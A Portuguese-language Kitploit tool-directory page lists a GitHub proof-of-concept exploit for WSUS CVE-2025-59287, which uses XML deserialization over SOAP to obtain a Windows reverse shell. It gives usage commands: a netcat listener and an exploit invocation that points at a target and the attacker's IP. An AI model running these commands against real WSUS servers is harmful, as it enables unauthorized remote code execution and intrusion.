Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59287 — PoC exploit para WSUS CVE-2025-59287 usando desserialização XML para obter um reverse shell no Windows via SOAP e ObjectDataProvider. | Kitploit
Ferramentas/GitHubGitHub/furkankayapinar/cve-2025-59287
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubfurkankayapinar/cve-2025-59287

CVE-2025-59287

PoC exploit para WSUS CVE-2025-59287 usando desserialização XML para obter um reverse shell no Windows via SOAP e ObjectDataProvider.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59287

WSUS CVE-2025-59287 – Desserialização XML RCE (Reverse Shell) Um PoC focado para explorar o WSUS CVE-2025-59287 via desserialização XML para obter uma reverse shell do Windows. Este script suporta apenas payload de reverse shell (sem fallback para calc). Alvo: Windows Server com função WSUS Técnica: Desserialização SOAP + ObjectDataProvider Resultado: cmd.exe executa PowerShell reverse shell para o seu listener Aviso legal Apenas para testes autorizados em ambientes de laboratório. Você é responsável por cumprir todas as leis aplicáveis. Requisitos Python 3.x Acesso de rede aos endpoints WSUS (geralmente 8530/8531) Listener na sua máquina (ex.: nc)

Iniciar listener

nc -lvnp 4444

Executar exploit

python3 my-CVE-2025-59287.py -u http://ALVO:8531 -l SEU_IP -p 4444 --debug

-u: URL base do WSUS (http/https, normalmente porta 8530/8531) -l: Seu IP para receber a shell -p: Porta do seu listener --debug: Saída detalhada

Baixar ferramenta